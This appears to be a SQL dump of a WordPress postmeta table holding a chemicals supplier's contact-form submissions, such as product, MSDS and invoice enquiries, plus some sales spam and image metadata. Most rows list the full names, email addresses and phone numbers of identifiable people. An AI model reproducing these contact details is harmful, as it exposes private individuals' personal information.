INSERT INTO `wp_postmeta` VALUES (30682, 3415, '_field_3', 'To whom it may concern,\r\nI found your website online. I’m a sales Rep. from Double Bond Chemical USA, Inc. We are a manufacturer of plastics additives from Taiwan. It’ll be great if you could forward the message to purchasing agent. Our sales site is located in Houston. We provide a wide range of UV absorbers, HALS, antioxidants, optical brightener, anti-wear agent etc. Based on your business, we got some additives specially designed for lubricants. If you’re interested in a second source of additives or new products please let me know. If you have any question please feel free to contact me. Thank you!  \r\n\r\nSincerely,\r\nEstella Fang'); 
INSERT INTO `wp_postmeta` VALUES (30683, 3415, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30684, 3415, '_sub_id', '3415'); 
INSERT INTO `wp_postmeta` VALUES (30685, 163, '_oembed_0073d20f9a019e189a66ea6fa4b19f40', '{{unknown}}'); 
INSERT INTO `wp_postmeta` VALUES (30686, 3416, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30687, 3416, '_seq_num', '218'); 
INSERT INTO `wp_postmeta` VALUES (30688, 3416, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30689, 3416, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30690, 3416, '_field_1', 'Koos Carstens'); 
INSERT INTO `wp_postmeta` VALUES (30691, 3416, '_field_10', 'BV-TISA'); 
INSERT INTO `wp_postmeta` VALUES (30692, 3416, '_field_2', 'koos.carstens@za.bureauveritas.com'); 
INSERT INTO `wp_postmeta` VALUES (30693, 3416, '_field_8', '(082) 738-0075'); 
INSERT INTO `wp_postmeta` VALUES (30694, 3416, '_field_3', 'Do you have a supplier in South Africa?'); 
INSERT INTO `wp_postmeta` VALUES (30695, 3416, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30696, 3416, '_sub_id', '3416'); 
INSERT INTO `wp_postmeta` VALUES (30697, 3417, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30698, 3417, '_seq_num', '219'); 
INSERT INTO `wp_postmeta` VALUES (30699, 3417, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30700, 3417, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30701, 3417, '_field_1', 'COLLEEN FOLEY'); 
INSERT INTO `wp_postmeta` VALUES (30702, 3417, '_field_10', 'ELBIT SYSTEMS (KOLLSMAN)'); 
INSERT INTO `wp_postmeta` VALUES (30703, 3417, '_field_2', 'colleen.foley@elbitsystems-us.com'); 
INSERT INTO `wp_postmeta` VALUES (30704, 3417, '_field_8', '(603) 886-2518'); 
INSERT INTO `wp_postmeta` VALUES (30705, 3417, '_field_3', 'do you carry Camie 1380 mold release'); 
INSERT INTO `wp_postmeta` VALUES (30706, 3417, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30707, 3417, '_sub_id', '3417'); 
INSERT INTO `wp_postmeta` VALUES (30710, 3420, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30711, 3420, '_seq_num', '220'); 
INSERT INTO `wp_postmeta` VALUES (30712, 3420, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30713, 3420, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30714, 3420, '_field_1', 'Natalie Meyer'); 
INSERT INTO `wp_postmeta` VALUES (30715, 3420, '_field_10', 'Airgas USA'); 
INSERT INTO `wp_postmeta` VALUES (30716, 3420, '_field_2', 'natalie.meyer@airgas.com'); 
INSERT INTO `wp_postmeta` VALUES (30717, 3420, '_field_8', '(918) 551-4655'); 
INSERT INTO `wp_postmeta` VALUES (30718, 3420, '_field_3', 'PO 3000233010\n\nWe have not received the invoice for this PO for 50 EA GPL-205 ordered by our Springfield, MO branch.  Can you please forward a copy of that invoice to me or advise when these will be invoiced.\n\nThank You,'); 
INSERT INTO `wp_postmeta` VALUES (30719, 3420, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30720, 3420, '_sub_id', '3420'); 
INSERT INTO `wp_postmeta` VALUES (30724, 3422, '_wp_attached_file', '2016/09/Krytox.jpg'); 
INSERT INTO `wp_postmeta` VALUES (30725, 3422, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:662;s:4:"file";s:18:"2016/09/Krytox.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"Krytox-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"Krytox-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"Krytox-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"Krytox-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"Krytox-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"Krytox-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"Krytox-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:75;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (30726, 2050, '_thumbnail_id', '3422'); 
INSERT INTO `wp_postmeta` VALUES (30733, 3428, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30734, 3428, '_seq_num', '221'); 
INSERT INTO `wp_postmeta` VALUES (30735, 3428, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30736, 3428, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30737, 3428, '_field_1', 'John Newsome '); 
INSERT INTO `wp_postmeta` VALUES (30738, 3428, '_field_10', 'U.S Battery'); 
INSERT INTO `wp_postmeta` VALUES (30739, 3428, '_field_2', 'jnnewsome@usbattery.com'); 
INSERT INTO `wp_postmeta` VALUES (30740, 3428, '_field_8', '(706) 790-0218'); 
INSERT INTO `wp_postmeta` VALUES (30741, 3428, '_field_3', 'I would like to get a sample of MS-153 to see if this will work in our molding application . '); 
INSERT INTO `wp_postmeta` VALUES (30742, 3428, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30743, 3428, '_sub_id', '3428'); 
INSERT INTO `wp_postmeta` VALUES (30744, 3429, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30745, 3429, '_seq_num', '222'); 
INSERT INTO `wp_postmeta` VALUES (30746, 3429, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30747, 3429, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30748, 3429, '_field_1', 'Luiz Goldberg'); 
INSERT INTO `wp_postmeta` VALUES (30749, 3429, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (30750, 3429, '_field_2', 'luizgoldberg@hotmail.com'); 
INSERT INTO `wp_postmeta` VALUES (30751, 3429, '_field_8', '(954) 663-3412'); 
INSERT INTO `wp_postmeta` VALUES (30752, 3429, '_field_3', 'I bought in the past MS-260 and I would like to buy it again. Can I order online?'); 
INSERT INTO `wp_postmeta` VALUES (30753, 3429, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30754, 3429, '_sub_id', '3429'); 
INSERT INTO `wp_postmeta` VALUES (30755, 3430, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30756, 3430, '_seq_num', '223'); 
INSERT INTO `wp_postmeta` VALUES (30757, 3430, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30758, 3430, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30759, 3430, '_field_1', 'Simon Dsouza'); 
INSERT INTO `wp_postmeta` VALUES (30760, 3430, '_field_10', 'V3 Data Intel'); 
INSERT INTO `wp_postmeta` VALUES (30761, 3430, '_field_2', 'simon.dsouza@v3dataintel.com'); 
INSERT INTO `wp_postmeta` VALUES (30762, 3430, '_field_8', '(732) 320-9114'); 
INSERT INTO `wp_postmeta` VALUES (30763, 3430, '_field_3', '\r\nHi,\r\n\r\nWe have the new ‘Composite Professionals’ Email List with complete contact information such as Company Name, Website, Contact Name, First Name, Last Name, Email Address, Title, Address, City, State, Zip Code, Phone, Fax Number, Website, Industry, SIC code, etc.,\r\n\r\nI just wanted to check if you would be interested in purchasing ‘Composite Professionals’ list to reach your target audience and expand your market reach in 2016.\r\n\r\nNote: If Composite Professionals is not relevant to you please reply back with your requirement, we have all type of lists that would meet your quality prospecting- \r\n\r\nTarget Industry:  _____________; Geography:  ______________; Job Title (Any):  _________________:\r\n\r\nLook forward to hearing from you\r\n'); 
INSERT INTO `wp_postmeta` VALUES (30764, 3430, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30765, 3430, '_sub_id', '3430'); 
INSERT INTO `wp_postmeta` VALUES (30766, 3431, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30767, 3431, '_seq_num', '224'); 
INSERT INTO `wp_postmeta` VALUES (30768, 3431, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30769, 3431, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30770, 3431, '_field_1', 'Thuzar Han'); 
INSERT INTO `wp_postmeta` VALUES (30771, 3431, '_field_10', 'St. Jude Medical'); 
INSERT INTO `wp_postmeta` VALUES (30772, 3431, '_field_2', 'than@sjm.com'); 
INSERT INTO `wp_postmeta` VALUES (30773, 3431, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (30774, 3431, '_field_3', 'Could you please send me a MSDS for MS-472C\r\n\r\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (30775, 3431, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30776, 3431, '_sub_id', '3431'); 
INSERT INTO `wp_postmeta` VALUES (30777, 3422, 'wpfc_optimisation_reduction', '586610'); 
INSERT INTO `wp_postmeta` VALUES (30778, 3422, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LmpwZyIsIndpZHRoIjoxMDAwLCJoZWlnaHQiOjY2MiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0tyeXRveC5qcGciLCJyZWR1Y3Rpb24iOjU4NjYwMywidGltZSI6MTQ4NDA3OTM2OCwiaWQiOiIzNDIyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Lcnl0b3gtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Lcnl0b3gtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Lcnl0b3gtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODQwNzkzNzEsImlkIjozNDIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0tyeXRveC04MDB4NTMwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0tyeXRveC04MDB4NTMwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0tyeXRveC04MDB4NTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4NDA3OTM3NCwiaWQiOjM0MjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LTc2OHg1MDguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MDgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LTc2OHg1MDguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvS3J5dG94LTc2OHg1MDguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDg0MDc5Mzc2LCJpZCI6MzQyMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Lcnl0b3gtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Lcnl0b3gtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Lcnl0b3gtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODQwNzkzNzksImlkIjozNDIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0tyeXRveC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0tyeXRveC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0tyeXRveC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4NDA3OTM4MSwiaWQiOjM0MjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvS3J5dG94LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDg0MDc5Mzg0LCJpZCI6MzQyMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Lcnl0b3gtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Lcnl0b3gtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Lcnl0b3gtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODQwNzkzODYsImlkIjozNDIyfV0='); 
INSERT INTO `wp_postmeta` VALUES (30779, 3432, '_wp_attached_file', '2017/01/530N-17.pdf'); 
INSERT INTO `wp_postmeta` VALUES (30780, 3433, '_wp_attached_file', '2017/01/538N-17.pdf'); 
INSERT INTO `wp_postmeta` VALUES (30781, 3435, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30782, 3435, '_seq_num', '225'); 
INSERT INTO `wp_postmeta` VALUES (30783, 3435, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30784, 3435, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30785, 3435, '_field_1', 'Satyaprakash'); 
INSERT INTO `wp_postmeta` VALUES (30786, 3435, '_field_10', 'MKSINST'); 
INSERT INTO `wp_postmeta` VALUES (30787, 3435, '_field_2', 'satyaprakash_r@mksinst.com'); 
INSERT INTO `wp_postmeta` VALUES (30788, 3435, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (30789, 3435, '_field_3', 'Hello,\r\n\r\nPlease advise the current Lifecycle and ROHS status of the parts listed below.\r\nIf parts are obsolete, please advise the EOL / LTB dates and suitable replacements.\r\nIf the parts are active please provide COC w.r.t ROHS.\r\n\r\n907\r\n\r\n\r\nNote: If parts are Obsolete please provide PDN for the same\r\n\r\nYour attention and response to this email is appreciated.\r\n\r\n----------------------------------------------\r\nThanks &amp; regards\r\nSatyaprakash.R\r\nSr.Component Engineer\r\nsatyaprakash_r@mksinst.com\r\n'); 
INSERT INTO `wp_postmeta` VALUES (30790, 3435, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30791, 3435, '_sub_id', '3435'); 
INSERT INTO `wp_postmeta` VALUES (30792, 3437, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30793, 3437, '_seq_num', '226'); 
INSERT INTO `wp_postmeta` VALUES (30794, 3437, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30795, 3437, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30796, 3437, '_field_1', 'Mark Hodges'); 
INSERT INTO `wp_postmeta` VALUES (30797, 3437, '_field_10', 'Chemprene'); 
INSERT INTO `wp_postmeta` VALUES (30798, 3437, '_field_2', 'Mark.Hodges@chemprene.com'); 
INSERT INTO `wp_postmeta` VALUES (30799, 3437, '_field_8', '(845) 831-2800'); 
INSERT INTO `wp_postmeta` VALUES (30800, 3437, '_field_3', 'I would like to request recommended shelf life information for the following product,  EPON 828                   01Y.\r\n\r\nThank you.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (30801, 3437, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30802, 3437, '_sub_id', '3437'); 
INSERT INTO `wp_postmeta` VALUES (30803, 3438, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30804, 3438, '_seq_num', '227'); 
INSERT INTO `wp_postmeta` VALUES (30805, 3438, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30806, 3438, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30807, 3438, '_field_1', 'Sandy Critser'); 
INSERT INTO `wp_postmeta` VALUES (30808, 3438, '_field_10', 'Times Up dba H &amp; H Enterprises'); 
INSERT INTO `wp_postmeta` VALUES (30809, 3438, '_field_2', 'sandyc@visstun.com'); 
INSERT INTO `wp_postmeta` VALUES (30810, 3438, '_field_8', '(702) 876-6292'); 
INSERT INTO `wp_postmeta` VALUES (30811, 3438, '_field_3', 'Hello - we are looking for a reliable provider of oil &amp; grease for our industrial equipment.  We are located in Las Vegas, NV and we use the following lubricants in our PMC forming machines as well as in our Elmo Rietschle rotary vane vacuum pumps.  Meropa Synthetic EP320 oil (55 gallon), White Mineral Oil 200 (55 gallon) and Elmo Rietschle Multi-Lube 100M #75175002 (5 gallon).   If these are products you can provide would you please send us a quote with lead time?  Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (30812, 3438, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30813, 3438, '_sub_id', '3438'); 
INSERT INTO `wp_postmeta` VALUES (30814, 3439, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30815, 3439, '_seq_num', '228'); 
INSERT INTO `wp_postmeta` VALUES (30816, 3439, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30817, 3439, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30818, 3439, '_field_1', 'willie'); 
INSERT INTO `wp_postmeta` VALUES (30819, 3439, '_field_10', 'mainlight'); 
INSERT INTO `wp_postmeta` VALUES (30820, 3439, '_field_2', 'bill@mainlight.com'); 
INSERT INTO `wp_postmeta` VALUES (30821, 3439, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (30822, 3439, '_field_3', 'just a dumb question. Are you supposed to shake the can of contact re-nu before spraying? or just spray.\r\n\r\nthank you'); 
INSERT INTO `wp_postmeta` VALUES (30823, 3439, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30824, 3439, '_sub_id', '3439'); 
INSERT INTO `wp_postmeta` VALUES (30825, 3440, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (30826, 3440, '_seq_num', '194'); 
INSERT INTO `wp_postmeta` VALUES (30827, 3440, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30828, 3440, '_field_12', 'Joe zdybowicz'); 
INSERT INTO `wp_postmeta` VALUES (30829, 3440, '_field_13', 'Trans FX'); 
INSERT INTO `wp_postmeta` VALUES (30830, 3440, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (30831, 3440, '_field_14', 'jzdybowicz@transfx.com'); 
INSERT INTO `wp_postmeta` VALUES (30832, 3440, '_field_15', '(805) 485-6110'); 
INSERT INTO `wp_postmeta` VALUES (30833, 3440, '_field_16', 'have you seen this before?\r\nEPOXY:\r\n                EPON 830/DEA (Diethanolamine Curative (Fisher Scientific))\r\n                TETA (Triethyleneteramine Curative (Air Products and Chemicles)\r\n                \r\nSyntatic Foam:\r\n        Formula\r\n                Resin – 22.5g EPON830 + 150g H50 + 1 drop KF104 + 0.5g Grey Pigment\r\n                Curative – 100g T403 + 121g H50 + 6g TETA\r\n      Materials\r\n                T403 – Jeffamine T403 Curative (Trichloroethylene (Fisher Scientific))\r\n                H50 – 3M Glass Micrro Balloons\r\n                KF104 – ?\r\n                Grey Pigment – ?\r\n'); 
INSERT INTO `wp_postmeta` VALUES (30834, 3440, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (30835, 3440, '_sub_id', '3440'); 
INSERT INTO `wp_postmeta` VALUES (30836, 3441, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30837, 3441, '_seq_num', '229'); 
INSERT INTO `wp_postmeta` VALUES (30838, 3441, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30839, 3441, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30840, 3441, '_field_1', 'Jackie Ruis'); 
INSERT INTO `wp_postmeta` VALUES (30841, 3441, '_field_10', 'Wesco Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (30842, 3441, '_field_2', 'jackie.ruis@wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (30843, 3441, '_field_8', '(512) 519-3949'); 
INSERT INTO `wp_postmeta` VALUES (30844, 3441, '_field_3', 'Can you please tell me the VOC and the VOC less water and exempt solvents for your product MS-122AD DPMS Z0918A PTFE Release agent/dry lubricant?\r\n\r\nThank you\r\nID 300884'); 
INSERT INTO `wp_postmeta` VALUES (30845, 3441, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30846, 3441, '_sub_id', '3441'); 
INSERT INTO `wp_postmeta` VALUES (30847, 3442, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30848, 3442, '_seq_num', '230'); 
INSERT INTO `wp_postmeta` VALUES (30849, 3442, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30850, 3442, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30851, 3442, '_field_1', 'Jenn Broadbin'); 
INSERT INTO `wp_postmeta` VALUES (30852, 3442, '_field_10', 'HUPLAS.com'); 
INSERT INTO `wp_postmeta` VALUES (30853, 3442, '_field_2', 'jenn@huplas.com'); 
INSERT INTO `wp_postmeta` VALUES (30854, 3442, '_field_8', '(203) 556-9030'); 
INSERT INTO `wp_postmeta` VALUES (30855, 3442, '_field_3', 'I would like total with someone in Human Resources about an internship for a young man I am working with that is a Chemical Engineering Student at Cornell.  He is off this semester and I would like to explore an internship with your company for the Danbury CT location.  Please call me at your earliest convenience.  Many thanks!  Jenn'); 
INSERT INTO `wp_postmeta` VALUES (30856, 3442, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30857, 3442, '_sub_id', '3442'); 
INSERT INTO `wp_postmeta` VALUES (30858, 3443, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30859, 3443, '_seq_num', '231'); 
INSERT INTO `wp_postmeta` VALUES (30860, 3443, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30861, 3443, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30862, 3443, '_field_1', 'BOB PHETSRI'); 
INSERT INTO `wp_postmeta` VALUES (30863, 3443, '_field_10', 'Techstore Co.,LTD, THAILAND'); 
INSERT INTO `wp_postmeta` VALUES (30864, 3443, '_field_2', 'TechStore@polysource.co.th'); 
INSERT INTO `wp_postmeta` VALUES (30865, 3443, '_field_8', ''); 
